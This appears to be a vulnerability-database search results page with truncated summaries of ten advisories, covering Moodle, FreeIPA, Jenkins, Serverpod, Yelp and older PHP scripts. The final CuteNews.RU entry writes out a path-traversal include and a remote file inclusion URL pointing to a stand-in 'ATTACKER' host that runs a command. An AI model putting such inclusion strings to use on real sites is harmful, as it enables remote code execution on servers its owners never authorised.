10 matches found
EUVD-2007-4402
Malware in sbrugna...
EUVD-2006-4072
Malware in sbrugna...
CVE-2024-45691
A flaw was found in Moodle. When restricting access to a lesson activity with a password, certain passwords could be bypassed or less secure due to a loose comparison in the password-checking logic. This issue only affected passwords set to "magic hash" values...
Rocky Linux 9 : ipa (RLSA-2024:3754)
The remote Rocky Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2024:3754 advisory. freeipa: delegation rules allow a proxy service to impersonate any user to access another target service CVE-2024-2698 freeipa: user can obtain a hash o...
eZ Publish Legacy Patch EZSA-2018-001 for Several vulnerabilities
This security advisory fixes 4 separate vulnerabilities in eZ Publish Legacy, and we recommend that you install it as soon as possible if you are using Legacy by itself or via the LegacyBridge. First, it increases the randomness, and thus the security, of the pseudo-random bytes used to generate ...
GHSA-R75M-26CQ-MJXC Serverpod improved security for stored password hashes
Description Improved security for stored password hashes Serverpod now uses the OWASP, source, recommended Argon2Id password hash algorithm to store password hashes for the email authentication module. Starting from Serverpod 1.2.6 all users that either creates an account or authenticates with th...
PT-2022-27481 · Jenkins · Jenkins Script Security Plugin +1
Name of the Vulnerable Software and Affected Versions: Jenkins Script Security Plugin versions 1189.vb a b 7c8fd5fde and earlier Description: The issue arises from the storage of whole-script approvals as the SHA-1 hash of the script, which no longer meets security standards for producing a...
Yelp: IDOR in locid parameter allowing to view others accounts Profile Locations
The application transmits in many occasions the locid parameter via URL, which means that this parameter may be being logged in plan text in the Apache server access.log, if not in others also. The fact that this happens, makes this parameter vulnerable not only to be read from this log file, but...
yourownbux40-sql.txt
.. \ \ | | | | \ / \ / // / \ | | | \ | \ | \ /\ \ | / /| /| / \ \ / || / / / / . . | | \ | | | \ \ | \ / / | | / | \ \ \ | / / / / / / ---------------==---------------==---------------==---------------==---------------==---------------= -----============ Yourownbux v4.0 Blind...
CuteNews.RU v026 - bugs
Network security team nst.e-nex.com Title: CuteNews.RU v026 - bugs Bug found by: тёмыч Date: 25.10.2004 Если magicquotesgpc = off include showarchives.php?template=../../../../../../../../file00 Если .htaccess неработает include /inc/shows.inc.php?cutepath=http://ATTACKER&nst=id предворительна...